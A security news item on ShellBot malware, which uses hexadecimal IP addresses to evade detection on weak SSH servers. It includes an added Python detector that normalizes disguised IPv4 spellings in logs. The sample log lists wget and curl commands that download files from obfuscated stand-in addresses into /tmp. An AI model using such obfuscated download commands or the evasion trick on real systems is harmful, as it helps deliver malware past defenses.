ShellBot’s threat actors use IP addresses converted to hexadecimal notation to infiltrate poorly maintained Linux SSH servers and deliver DDoS malware. “The overall flow remains the same, but the download URL used by the threat actor to install ShellBot has changed from a regular IP address to a hexadecimal value,” according to a new study issued today by the AhnLab Security Emergency Response Center (ASEC).
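Tools that parse hosts the way inet_aton does treat a hexadecimal host as the same address as its dotted form, so a dotted-quad blocklist or detection rule misses it unless hosts are normalized first. The following is an added example, not code from the ASEC report: it normalizes IPv4 spellings in URLs found in command-line logs, generalizing beyond hexadecimal to the octal, decimal and short dotted forms. The function names, the sample log lines and the 192.0.2.10 documentation address are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

URL_RE = re.compile(r"\b(?:https?|ftp)://[^\s'\"]+", re.I)
NUM_RE = re.compile(r"(0x[0-9a-f]+)|(0[0-7]*)|([1-9][0-9]*)")

def _num(tok):
    """Parse one inet_aton-style number: 0x hex, leading-0 octal, else decimal."""
    m = NUM_RE.fullmatch(tok.lower())
    if not m:
        raise ValueError(tok)
    hx, oc, de = m.groups()
    return int(hx, 16) if hx else int(oc, 8) if oc else int(de)

def normalize_ipv4(host):
    """Dotted-quad for any inet_aton-style spelling, or None if not an IPv4 literal."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        *head, last = [_num(p) for p in parts]
    except ValueError:
        return None
    # Leading parts are single bytes; the last part fills the remaining bytes.
    if any(n > 0xFF for n in head) or last >= 256 ** (4 - len(head)):
        return None
    value = last
    for i, n in enumerate(head):
        value |= n << (8 * (3 - i))
    return ".".join(str((value >> s) & 0xFF) for s in (24, 16, 8, 0))

def scan(lines):
    """Return (line_no, url, dotted_quad) for URLs whose host is a disguised IPv4."""
    hits = []
    for no, line in enumerate(lines, 1):
        for url in URL_RE.findall(line):
            try:
                host = urlsplit(url).hostname or ""
            except ValueError:
                continue  # malformed URL, nothing to normalize
            dotted = normalize_ipv4(host)
            if dotted and dotted != host:  # plain dotted-quad hosts are not flagged
                hits.append((no, url, dotted))
    return hits

SAMPLE_LOG = [  # constructed command lines, not taken from the report
    "wget -q http://0xC000020A/sample -O /tmp/sample",
    "curl -s http://192.0.2.10/sample -o /tmp/sample",
    "curl -O https://example.com/pkg.tar.gz",
    "wget http://3221225994:8080/b",
]
```

Feed the normalized address, rather than the raw host string, into blocklist lookups and alert enrichment so that every spelling of one address matches a single indicator.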
ShellBot, also known as PerlBot, is reported to use dictionary attacks to compromise servers with weak SSH credentials; the malware then acts as a conduit for orchestrating DDoS attacks and delivering cryptocurrency miners. Written in Perl, it communicates with its command-and-control (C2) server over the IRC protocol.